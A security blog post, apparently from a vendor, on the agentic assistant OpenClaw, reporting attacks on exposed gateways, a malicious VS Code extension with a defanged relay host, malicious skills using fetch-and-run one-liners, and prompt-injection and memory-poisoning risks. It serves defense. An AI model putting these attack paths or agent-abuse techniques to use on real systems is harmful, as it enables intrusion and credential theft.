OpenClaw: Agentic AI in the wild — Architecture, adoption and emerging security risks

Over the past few weeks, OpenClaw has rapidly evolved from a niche open‑source project into one of the most widely discussed examples of agentic AI in practice. The idea is simple and compelling: Instead of asking an AI questions, you delegate tasks. OpenClaw can read messages, send emails, manage calendars, automate workflows and act across real systems — all through familiar chat interfaces.

This combination of intelligence, autonomy and integration is precisely why OpenClaw has captured attention across developer and security communities. It is also why it has become a focal point for serious security concerns. Unlike traditional chatbots, OpenClaw operates as a privileged agent with access to local systems, credentials and external services. When these systems are misconfigured, impersonated or extended through untrusted components, the resulting security impact can be substantial.

What OpenClaw is and how it works

OpenClaw is an open-source personal AI assistant designed to run locally on a user’s machine. It presents itself primarily through messaging platforms such as WhatsApp, Telegram, Slack, Discord or iMessage, and optionally through a local “Control UI” (also referred to as a canvas or dashboard). From the user’s perspective, OpenClaw feels like a conversational assistant. Under the hood, it is much closer to a local automation platform with an AI‑driven control layer.

At the center of the system is the Gateway, a locally running service that brokers communication between chat interfaces, the AI model and tools or “skills.” The Gateway exposes APIs (notably over a WebSocket interface on TCP port 18789) used by the Control UI and other components. OpenClaw’s documentation emphasizes that the Gateway is intended to be accessed locally or through secure tunnels, not exposed directly to the internet.

The agent can be extended through “skills” — effectively packages of executable code and configuration that add new capabilities. Once enabled, skills may interact with the local filesystem, network and connected services. Persistent memory allows OpenClaw to retain context and personalization across sessions, which is a key part of its appeal as a long-lived assistant.

This design enables powerful workflows. It also creates a security model that is fundamentally different from that of traditional SaaS AI tools.

Why OpenClaw is different from typical AI tools

Most consumer AI systems are stateless or narrowly scoped. OpenClaw is explicitly stateful, integrated and empowered to act. It can store credentials, remember conversations, execute commands and communicate externally on behalf of the user. As several security researchers have noted, this effectively turns the agent into a new kind of privileged identity.

The risk is not that OpenClaw “uses AI,” but that it combines three properties in a single system:

Access to sensitive data and credentials.
Exposure to untrusted input (especially via messaging platforms).
The ability to take autonomous actions and communicate externally.

This combination dramatically increases the blast radius of misconfigurations, social engineering or supply chain compromise.

Over a very short period of time, multiple independent security teams, including Acronis, analyzed OpenClaw deployments and its growing ecosystem. The findings are notable not because they reveal obscure vulnerabilities, but because they show how quickly real-world risks emerge when agentic AI systems meet internet-scale adoption.

Pillar Security honeypot: Exposed gateways were attacked as an API service, not as an “AI bot”

Pillar Security set up a honeypot that mimicked a Clawdbot / Moltbot gateway (OpenClaw’s earlier names) and saw protocol-aware exploitation within minutes / hours. The key point: many attackers skipped prompt injection entirely and went straight to the gateway’s WebSocket API on TCP/18789, treating it like a remotely exploitable control plane.

What attackers targeted

Authentication gaps / bypass paths in real-world deployments (especially reverse proxies).
Downgrading protocol versions to hit older behavior.
Raw tool execution / file reads via JSON-RPC / MCP-style payloads.
Credential and token harvesting (LLM API keys, chat tokens, gateway creds), plus conversation history.

How it was executed

Reach the gateway on port 18789 and attempt to connect as a legitimate client (e.g., spoofing “control UI”).
Exploit “auth defaults to none”: Pillar shows that when gateway.auth.token or gateway.auth.password wasn’t set, the gateway could allow unauthenticated access (fixed January 26, 2026).
Exploit reverse proxy trust: Gateways behind nginx/Caddy/Traefik could treat proxied traffic as “localhost,” allowing auth bypass unless gateway.trustedProxies is configured (fixed January 26, 2026).
Protocol downgrade attempts: Attackers tried minProtocol/maxProtocol: 1 to target prepatch behavior.
Command + file-access probes using JSON-RPC “tool exec/read” patterns (examples Pillar captured include whoami, reading /etc/os-release, and attempts to list/read session logs under ~/.clawdbot/.../sessions/*.jsonl).
This is not a theoretical prompt‑injection risk; it reflects the same exploitation paths seen in internet‑exposed administrative APIs: enumerate → downgrade → impersonate client → execute/read → steal tokens → persist. Pillar explicitly says attackers’ probes mapped to real handlers and looked like they’d read the source.

Censys mapping: The risk isn’t only “a bug,” it’s mass internet exposure at viral scale

Censys reports adoption jumping from ~1,000 to 21,000+ publicly exposed instances in under a week (as of January 31, 2026).

The security issue Censys highlights OpenClaw is intended to run locally on TCP/18789 or be accessed via protective mechanisms like SSH or Cloudflare Tunnel, but many users exposed it directly on the public internet.

Aikido: Malicious VS Code extension impersonated OpenClaw / Clawdbot and dropped a real remote-access implant

Aikido documented a malicious VS Code Marketplace extension named “ClawdBot Agent” (January 27, 2026). It looked legitimate and even “worked,” but installed a remote access payload on Windows as soon as VS Code started.

How it was executed

The extension registers an automatic startup trigger (activationEvents: ["onStartupFinished"]) so it runs every time VS Code starts with no clicks.
It pulls a config from attacker infrastructure (Aikido shows a config.json file list including Code.exe, DWrite.dll, etc.).
The dropped Code.exe was identified as ConnectWise ScreenConnect, a legitimate remote management tool — but configured to connect to the attacker’s relay server, so victims “phone home” immediately.
Aikido extracted embedded settings showing the relay host and port (example shown: meeting.bulletmailer[.]net with port 8041), plus an RSA key parameter — meaning the installer was prebound to attacker infrastructure.

Defense evasion / resilience Aikido describes a redundant chain:

A Rust-based DLL (DWrite.dll) used DLL sideloading and could fetch payloads from Dropbox if primary infrastructure failed.
The JavaScript includes hardcoded fallback URLs; plus, a run.bat path provides yet another fallback route.

This is a textbook “viral open-source brand → ecosystem abuse” pattern: Attackers didn’t need to compromise OpenClaw itself; they hijacked the attention wave and delivered malware through an adjacent distribution channel.

Malicious “skills” on ClawHub: Extensions weren’t sandboxed, and attackers relied on “copy-paste this command” social engineering

Tom’s Hardware reports that 14 malicious skills were uploaded to ClawHub between January 27–29. They masqueraded as cryptowallet automation tools but were malicious.

Key technical risk: Skills run as real code Skills in this ecosystem are not “safe scripts;” they are folders of executable code that can interact with the local file system and network once installed and enabled.

How the attack worked

The skills used social engineering during “setup”:

o Prompts to run obfuscated terminal one-liners that fetched and executed remote scripts.

The intent (per the reporting) was to harvest browser data and cryptowallet information targeting Windows and macOS.

One malicious skill even appeared on ClawHub’s front page before removal, increasing accidental installs.

If a “skill” can run code, plus the agent has access to secrets / tokens, the skill becomes a privileged execution vector that users opt into because it “adds features.”

Malwarebytes: Impersonation via typosquats + cloned repos — “Clean code today lowers suspicion tomorrow”

Malwarebytes described a fast-moving impersonation campaign after the name change (Clawdbot → Moltbot), including typosquat domains and a cloned GitHub repo impersonating the creator.

Malwarebytes explicitly says the absence of malware was the strategy: the cloned repo could look clean and pass audit now so users would install it, then configure it with API keys and tokens — establishing trust and setting up a future supply chain attack opportunity.

How OpenClaw’s functionality maps to security risks

This section is the “threat model” translation: feature → risk → how it shows up in the real world.

Messaging integrations (WhatsApp, Telegram, Slack, etc.)

What it enables: convenient “chat-as-UI” control plane; potentially also operation in groups or channels. Core risks:

Prompt injection via untrusted messages (malicious instructions embedded in normal-looking text).
Impersonation / social engineering (“hey, run this setup step,” “install this skill,” “click this link”).
Cross-channel data leakage (agent accidentally forwards content between accounts or channels).

Cisco specifically flags the messaging surface as expanding the attack surface and enabling malicious prompts.

Local gateway + remote exposure

What it enables: a daemon / dashboard that orchestrates sessions, channels, tools, events; local-first, but often self-hosted. Core risks:

Unauthenticated or weakly authenticated remote access (internet-exposed control plane).
Credential leakage (API keys, OAuth tokens, chat histories).
Direct command execution if the control plane exposes tool endpoints.

This is not hypothetical: Censys measured 21k+ exposed instances (January 31, 2026). Pillar Security describes real-world probing / attack traffic against exposed gateways.

“Skills” / plugins / extensions ecosystem

What it enables: Extending capabilities via third-party code and instructions (registries, downloadable skills). Core risks:

Supply chain compromise (malicious skills / extensions distributed under hype).
Privilege amplification (a “skill” is effectively executable code with file system or network access once installed).
Hidden behavior (exfiltration, backdoors, credential harvesters).

Tom’s Hardware reports skills “are not sandboxed scripts but folders of executable code” with local file system / network interaction once enabled.

Cisco’s writeup underscores that installing a malicious or injected skill is equivalent to granting harmful capabilities.

Persistent memory plus long-term context

What it enables: Personalization and continuity across sessions (a big part of the “it feels like a real assistant” appeal). Core risks:

Sensitive data accumulation (the assistant becomes a single high-value data store).
Memory poisoning (attacker plants instructions or false “facts” that persist).
Cross-context leakage (private info reused in the wrong place).

Even when running locally, persistent memory increases blast radius: Compromise once, benefit for a long time.

Autonomous actions (“Do things,” schedule, execute)

What it enables: proactive workflows (email triage, calendar ops, trading experiments, etc.). Core risks:

High-speed failure modes (small mistake repeated at scale).
Delegation risk (users grant excessive permissions “to see what it can do”).
Semantic attacks that don’t look like malware (hard for traditional controls).

VentureBeat emphasizes that this class of threat is “semantic rather than syntactic,” and highlights Willison’s “lethal trifecta” framing (private data access + untrusted content + external communication).

Practical risk-reduction guidance

This is not a recommendation to avoid the technology; instead, it outlines how to use it safely without turning your digital life into a lab accident.

For individual users / researchers

Keep the gateway local only, unless you really understand the exposure path; treat port exposure as a critical risk.
Treat inbound messages as untrusted input and avoid enabling group / channel control on accounts where strangers can message it.
Only install skills or extensions you can review like any other executable dependency; don’t run “paste this one-liner” setup steps from random sources.
Use separate, least-privilege accounts / tokens (email, Slack, etc.) so compromise doesn’t equal “everything.” Over-permissioning is a fundamental failure mode.

For companies (where “shadow OpenClaw” is the real risk)

Assume developers are experimenting already and prioritize visibility: Look for exposed gateways, unusual bot identities or new OAuth grants.
Model agent deployments as privileged identities: Log agent actions, scope credentials tightly and restrict what data an agent can read vs. where it can send.
Harden “skills” as supply chain: Treat them like packages with reviews, signing / allowlists and scanning. Scanning skills are dangerous as well as the risk hidden in metadata / instructions.

What to watch next

Based on the described above, the next security “inflection points” are likely to be:

Whether default auth / safe remote access becomes truly foolproof (and how quickly exposed instance counts fall).
Whether the skills ecosystem gains stronger trust signals (verification, signing, moderation) after malware incidents.
Whether OpenClaw (and peers) can meaningfully mitigate prompt injection in high-privilege, multichannel environments — a challenge that even mainstream coverage flags as “shockingly easy” via chat surfaces if misused.

Conclusion

OpenClaw demonstrates that agentic AI is no longer theoretical. It works, it scales and people want it. At the same time, recent research shows that when intelligence, autonomy and integration converge, security assumptions must change.

The incidents observed so far — exposed gateways, impersonation malware, malicious extensions and supply chain abuse — are not failures unique to OpenClaw. They are early indicators of the challenges that will accompany the broader adoption of agentic AI systems.

For security teams, the lesson is not to block innovation, but to recognize that these agents are new high-privilege entities. They require the same level of scrutiny as remote administration tools and, in many cases, greater oversight.